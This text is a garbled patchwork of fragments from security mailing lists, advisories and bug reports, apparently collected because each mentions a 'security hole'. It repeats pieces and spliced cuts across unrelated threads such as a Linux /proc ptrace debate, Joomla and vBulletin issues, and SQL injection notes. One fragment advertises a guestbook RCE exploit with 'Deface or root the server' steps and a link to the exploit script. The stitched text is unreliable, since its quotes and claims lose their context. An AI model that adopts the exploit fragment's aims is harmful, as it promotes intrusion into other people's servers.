security hole
}
#endif
- /* If this is a SETUID programme, dup /dev/null to openned stdin,
+ /* If this is a SET?ID program, dup /dev/null to openned stdin,
stdout and stderr to close a security hole described in:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:23.stdio.asc
*/
- if (getuid() != geteuid())
> >guest certianly does not have permission to ptrace() pavel's
> >processes, so...
>
> But guest has permissions to ptrace() his own processes. If we
> remember your original report, he abuses input redirection of bash
> run by himself. So again, there's no real security hole here.
guest abuses ptrace permissions on his own processes to write to
pavel's files... no, that obviously is not security hole :-).
Whatever. I agree that it is obscure, but I believe that it is
As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.
Credits: The original finder of the security hole. (Jelsoft?)
Researched & Disclosed by: MaXe (InterN0T.net)
Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572
On Sat 2009-10-24 01:24:49, Dan Yefimov wrote:
> On 24.10.2009 1:08, Pavel Machek wrote:
> >>That can hardly be called a real security hole, since the behaviour
> >>described above is expected, and is as it was conceived by design.
> >>If the file owner in fact allows writing to it, why should Linux
> >>prevent that from happening?
> >
> >No, I do not think this is expected. You could not write to that file
> >under traditional unix, and you can not write into that file when
> >/proc is unmounted.
>>> guest certianly does not have permission to ptrace() pavel's
>>> processes, so...
>>
>> But guest has permissions to ptrace() his own processes. If we
>> remember your original report, he abuses input redirection of bash
>> run by himself. So again, there's no real security hole here.
>
> guest abuses ptrace permissions on his own processes to write to
> pavel's files... no, that obviously is not security hole :-).
>
guest abuses ptrace permissions on his own processes to write to ANY file open
>>>>> guest certianly does not have permission to ptrace() pavel's
>>>>> processes, so...
>>>>
>>>> But guest has permissions to ptrace() his own processes. If we
>>>> remember your original report, he abuses input redirection of bash
>>>> run by himself. So again, there's no real security hole here.
>>>
>>> guest abuses ptrace permissions on his own processes to write to
>>> pavel's files... no, that obviously is not security hole :-).
>>>
>> guest abuses ptrace permissions on his own processes to write to ANY
> >>>guest certianly does not have permission to ptrace() pavel's
> >>>processes, so...
> >>
> >>But guest has permissions to ptrace() his own processes. If we
> >>remember your original report, he abuses input redirection of bash
> >>run by himself. So again, there's no real security hole here.
> >
> >guest abuses ptrace permissions on his own processes to write to
> >pavel's files... no, that obviously is not security hole :-).
> >
> guest abuses ptrace permissions on his own processes to write to ANY
> "even i see no reason for this. these ip addresses arent valid
> anymore. it seems that chris implemented this for a customer. i
> removed it now" (they are still in the default install image)
> "nvram unset ral
> nvram commit "
> "there is no security hole. both ip's are not active anymore and
> obsolete since a long time. "
> "i will lock this thread now. a new release is scheduled soon (within
> this or next week), but you cannot force me to release buggy code
> based on the current internal tree.thats my last statement on this
> topic" (Posted: Tue Aug 19, 2008 10:57 pm)
Hi all;
We have been informed that SQL-Ledger 2.8.34 has in fact been released
patching the security hole previously reported in LedgerSMB 1.2.24 and
Lower. This is an SQL injection issue.
I haven't been been able to find a CVE listing for this yet. Secunia
has assigned this the id of SA45649 for LedgerSMB. I expect to send a
full disclosure email discussing the vulnerability in a week.
It's easy to see, that $_COOKIE['admin'] variable will be used as argument
for "is_god()" function. And we have another critical sql injetion in place.
I have written proof-of-concept blind injection exploit for this specific
case and it's working flawlessly.
Happy news to potential victims - developer has allready patched this security
hole in NukeSentinel with releasing new version - 2.5.12
//-----> See ya soon and have a nice day ;) <-----//
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$count = mysql_num_rows($result);
--------------------------------------------------
As seen above, "$_POST['albumid']", "$_POST['startpic']" and
"$_POST['numpics']" are used in sql query without proper sanitization.
Clearly this points to possible sql injection security hole.
As this script can be used only by admins, then i'd classify it as
"low impact". By the way, there seems to be more sql injections in this
script.
clients e-mails, used it for spam and planted malware on their sites. All
due to a programming mistake of one their programmers: WHID 2007-75:
PlusNet blames itself for webmail spamfest
(http://www.webappsec.org/projects/whid/byid_id_2007-75.shtml). Other
hosting incidents: WHID 2007-74: Web host breach may have exposed passwords
for 6,000 clients, WHID 2007-77: HostGator: cPanel Security Hole Exploited
in Mass Hack, WHID 2007-76: A large web hosting firm inflicted by mass
malware installation.
+ The first CSRF entry in WHID, and a really bad one: CSRF in g-mail cost
someone his very successful domain, stolen by a blackmailer (WHID 2007-72:
Date: Jan 08, 2008
Severity: Mild
There exists a Cross Site Scripting security hole in Joomla 1.0.13.
Background
==========
laurent.gaffie@gmail.com wrote in response to me:
>"I don't see that this is a bug. Could you explain a little more fully?"
>
>well configured like this by default,it's a security hole . it's a perfect
>hole for a virus, trojan, etc. you can send any malicous files to a remote
>desktop via a malicious website or even a XSS , like an executable with a
>"my computer" icon ( for exemple .. )
OK, but there's no bug in the program that's exploitable in itself. The
> "even i see no reason for this. these ip addresses arent valid
> anymore. it seems that chris implemented this for a customer. i
> removed it now" (they are still in the default install image)
> "nvram unset ral
> nvram commit "
> "there is no security hole. both ip's are not active anymore and
> obsolete since a long time. "
> "i will lock this thread now. a new release is scheduled soon (within
> this or next week), but you cannot force me to release buggy code
> based on the current internal tree.thats my last statement on this
> topic" (Posted: Tue Aug 19, 2008 10:57 pm)
On 24.10.2009 1:08, Pavel Machek wrote:
>> That can hardly be called a real security hole, since the behaviour
>> described above is expected, and is as it was conceived by design.
>> If the file owner in fact allows writing to it, why should Linux
>> prevent that from happening?
>
> No, I do not think this is expected. You could not write to that file
> under traditional unix, and you can not write into that file when
> /proc is unmounted.
>
STEP3: Deface or root the server ;)
------> Infos about the Exploit
Unfortunaly, the RCE is only once possible and only after gaining acces to the admincenter... so choose your command usefull. (I tried to make a RFI out of it but the results were shitty because most of the webserver are secured against including php file from other webservers.)
The RCE is possible due a security hole when you change the Username. The script doesn´t check the input so we can manipulate the script.=)
-----> The Exploit Code
Get it here:
http://virii.lu/Perl-Scripts/GB_Pwner.txt
Subject: stardict broadcasts clipboard context over network
Package: stardict
Version: 3.0.1-4.1
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
In default config "enable net dict" is selected, it attempts to grab
This problem is not a threat because root user is able to boot any kernel without going through boot sequence (kexec) and is able to recover disk encryption key by inspecting dmcrypt module in memory. If an OS allows user to read raw memory without being root it's a security hole in OS and not in GRUB
(from smrksoft website)
2009/10/30 Vendor contacted
2009/10/30 Vendor response (That not a security hole but a feature....)
2009/10/30 Release this advisory
#####################################################################################
============================
On Oct 23, 2009, at 3:56 PM, Pavel Machek <pavel@ucw.cz> wrote:
> Demonstrate how to get access to the file with /proc unmounted and you
> have a point. Demonstrate how to get access on anything else then
> Linux and you have a point. Otherwise there's a security hole.
If the directory is mounted via NFS or is exported there are several
ways...so software written to assume directory permissions are
sufficent to protect users from other unpriveliged users is broken in
general. Even if it is usually secure enough on non-Linux. It is not
J. Carlos Nieto wrote:
>
> There exists a Cross Site Scripting security hole in Joomla 1.0.13.
>
Sorry, it should be "Cross Site Request Forgery".
> guest certianly does not have permission to ptrace() pavel's
> processes, so...
But guest has permissions to ptrace() his own processes. If we remember your
original report, he abuses input redirection of bash run by himself. So again,
there's no real security hole here.
--
Sincerely Your, Dan.
On 23.10.2009 21:16, Pavel Machek wrote:
> Hi!
>
> This is forward from lkml, so no, I did not invent this
> hole. Unfortunately, I do not think lkml sees this as a security hole,
> so...
>
> Jamie Lokier said:
>>>> a) the current permission model under /proc/PID/fd has a security
>>>> hole (which Jamie is worried about)
"even i see no reason for this. these ip addresses arent valid
anymore. it seems that chris implemented this for a customer. i
removed it now" (they are still in the default install image)
"nvram unset ral
nvram commit "
"there is no security hole. both ip's are not active anymore and
obsolete since a long time. "
"i will lock this thread now. a new release is scheduled soon (within
this or next week), but you cannot force me to release buggy code
based on the current internal tree.thats my last statement on this
topic" (Posted: Tue Aug 19, 2008 10:57 pm)
As a final update to this thread: Dan Bernstein acknowledged this bug
as a security hole in djbdns and recommends that users install my
patch. A copy of his post is available at
http://marc.info/?l=djbdns&m=123613000920446&w=2.
>> itself, not to the files in it, so your pretensions are in fact
>> illegitimate.
>
> Demonstrate how to get access to the file with /proc unmounted and you
> have a point. Demonstrate how to get access on anything else then
> Linux and you have a point. Otherwise there's a security hole.
>
Did you think of creating a hardlink to the file in an unrestricted location?
That is the like "security hole".
--
|
